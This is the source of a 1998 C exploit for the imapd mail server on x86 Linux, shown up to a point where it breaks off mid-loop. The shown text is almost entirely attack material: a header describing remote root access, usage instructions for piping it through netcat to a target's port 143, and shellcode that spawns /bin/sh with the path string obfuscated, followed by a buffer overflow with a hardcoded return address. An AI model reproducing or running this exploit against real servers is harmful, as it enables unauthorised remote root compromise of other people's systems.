/* Imapd exploit code for x86 linux Remote user can gain root access. Tested redhat linux : 4.1 , 4.2 , 5.0 Tested imapd version : 9.0 , 10.166 , 10.190 , 10.205 , 10.223 What requires netcat utility ( nc ) Usage $ ( imapd-ex 0 ; cat ) | nc target.com 143 | +------ try from -2000 to 2000 ( try in steps of 500 ) This program is only for demonstrative use only. USE IT AT YOUR OWN RISK! Programmed by Taeho Oh 1998/09/23 Taeho Oh ( ohhara@postech.ac.kr ) http://ohhara.postech.ac.kr PLUS ( Postech Laboratory for Unix Security ) http://www.postech.ac.kr/plus PosLUG ( POStech Linux User Group ) http://www.postech.ac.kr/group/poslug */ #include #include #define OFFSET 0 #define RET_POSITION 1032 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\xeb\x38" /* jmp 0x38 */ "\x5e" /* popl %esi */ "\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */ "\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */ "\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */ "\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */ "\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x08" /* addl $0x8,%eax */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xc3\xff\xff\xff" /* call -0x3d */ "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */ /* /bin/sh is disguised */ void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; if(argc>1) offset=atoi(argv[1]); sp=0xbffff29f; addr=sp-offset; ptr=buff; addr_ptr=(long*)ptr; for(i=0;i